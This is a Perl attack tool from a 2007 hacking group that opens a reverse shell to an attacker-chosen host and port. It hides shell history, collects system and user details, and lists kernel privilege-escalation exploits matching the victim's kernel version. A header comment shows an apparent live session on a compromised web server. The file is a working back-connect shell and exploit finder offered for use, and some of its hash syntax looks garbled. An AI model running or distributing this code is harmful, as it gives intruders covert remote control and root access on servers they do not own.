#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# 3sk0rbut0@gmail.com
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA
# ******* ConnectBack Shell *******
# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest
# Kernel local:
# 2.6.9-022stab078.14-smp
# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$
use IO::Socket;
use Socket;
use FileHandle;
$system = '/bin/bash';
if(!$ARGV[0])
{
print "
BackConnect Shell - D.O.M TEAM
";
print "Usage: perl $0 [IPHOST] [NCPORT]
";
print "Example: perl $0 82.85.55.21 6850
";
exit;
}
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket
";
print "[+] BackConnect Shell
";
print "[+] Conectando a $ARGV[0]...
";
print "[+] Enviando Shell...
";
print "[+] Conectado.
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "
******* ConnectBack Shell *******
";
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");
# Rootkernel
my $khost = `uname -r`;
chomp($khost);
print "
Kernel local: $khost
";
my %h;
$hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };
$hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$hsd_'ave' = { vuln=>['2.4.19','2.4.20'] };
$hsd_'elflbl' = { vuln=>['2.4.29'] };
$hsd_'elfdump' = { vuln=>['2.4.27'] };
$hsd_'expand_stack' = { vuln=>['2.4.29'] };
$hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$hsd_'kdump' = { vuln=>['2.6.13'] };
$hsd_'km2' = { vuln=>['2.4.18','2.4.22'] };
$hsd_'krad' = { vuln=>['2.6.11'] };
$hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] };
$hsd_'local26' = { vuln=>['2.6.13'] };
$hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] };
$hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] };
$hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace24' = { vuln=>['2.4.9'] };
$hsd_'pwned' = { vuln=>['2.4.','2.6.'] };
$hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
$hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$hsd_'remap' = { vuln=>['2.4.'] };
$hsd_'rip' = { vuln=>['2.2.'] };
$hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] };
$hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$hsd_'newsmp' = { vuln=>['2.6.'] };
$hsd_'smpracer' = { vuln=>['2.4.29'] };
$hsd_'loginx' = { vuln=>['2.4.22'] };
$hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$hsd_'prctl' = { vuln=>['2.6.'] };
$hsd_'kmdx' = { vuln=>['2.6.','2.4.'] };
&busca;
sub busca {
foreach my $key(keys %h){
foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
print "P0sible 3xploit: ". $key ."
";
}
}
}
}
print "
";
system 'export TERM=xterm;exec sh -i';
system($system);
__END__